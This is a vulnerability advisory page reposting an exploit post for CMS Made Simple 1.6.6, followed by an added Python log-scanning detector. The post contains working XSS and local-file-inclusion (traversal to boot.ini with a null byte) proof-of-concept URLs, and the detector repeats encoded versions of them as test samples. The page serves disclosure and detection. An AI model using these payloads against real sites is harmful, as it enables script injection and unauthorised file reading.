Information Security



Additional information

  Summary of security vulnerabilities in Web applications (PHP, ASP, JSP, CGI, Perl)

  Information disclosure vulnerability in Drupal's Realname User Reference Widget contributed module (version 6.x-1.0)

  Joomla (Jw_allVideos) Remote File Download Vulnerability

  Multiple Stored XSS in XOOPS 2.4.4 Admin Section

  LDF (Default.asp) Sql Injection Vulnerability

From: beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date: 16 February 2010
Subject: cmsmadesimple Multiple Security Issues : XSS+ LFI

                                                                    
                                                                    
                                                                    
                                            
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# Greetz to all Darkc0de ,AI,ICW, AH Members
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
#
# Home  : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple Vulnerabilities in cmsmadesimple
#
# AppSite: http://www.cmsmadesimple.com/
#
# Tested Version : 1.6.6
# XSS
#
#
POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
#
#
#
# Multiple Local File Inclusion
#
# Sample URL:
#
POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
#
################################################################
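
Detection logic for the two request patterns in the advisory above, added here as an example; it is not part of the original post or of CMS Made Simple. It scans web-server access-log lines for path-traversal characters or NUL bytes in `mact` and for non-boolean `showtemplate` values. The log lines are constructed, and reading `mact` as a comma-separated tuple and `showtemplate` as true/false-only are assumptions drawn from the PoC URLs.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (Apache-style), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Feb/2010:10:00:01 +0000] "GET /cmsmadesimple/index.php?page=news HTTP/1.1" 200 5120',
    '192.0.2.10 - - [16/Feb/2010:10:00:02 +0000] "GET /cmsmadesimple/index.php?mact=News%2ccntnt01%2cdetail%2c0&cntnt01showtemplate=false&cntnt01returnid=39 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [16/Feb/2010:10:00:03 +0000] "GET /cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5cboot.ini%00%2c0&cntnt01articleid=1 HTTP/1.1" 200 310',
    '198.51.100.7 - - [16/Feb/2010:10:00:04 +0000] "GET /cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4096',
    '198.51.100.7 - - [16/Feb/2010:10:00:05 +0000] "GET /cmsmadesimple/index.php?mact=News%2ccntnt01%2c%252e%252e%255cboot.ini%2c0 HTTP/1.1" 200 310',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %255c is seen as a backslash."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(url):
    """Return the set of findings for one request URL."""
    findings = set()
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = fully_decode(raw)
        if name == "mact":  # assumed layout: module,id,action,inline
            for field in value.split(","):
                if "\x00" in field:
                    findings.add("mact-nul-byte")
                if ".." in field or "/" in field or "\\" in field:
                    findings.add("mact-path-traversal")
        elif name.endswith("showtemplate") and value not in ("true", "false"):
            findings.add("showtemplate-not-boolean")  # assumed boolean-only
    return findings

def scan(lines):
    """Map line index -> findings for every log line that triggers a rule."""
    hits = {}
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        found = classify(m.group(1)) if m else set()
        if found:
            hits[i] = found
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same checks, applied as input validation before the parameters reach template or file-include logic, reject these requests instead of only reporting them.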

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


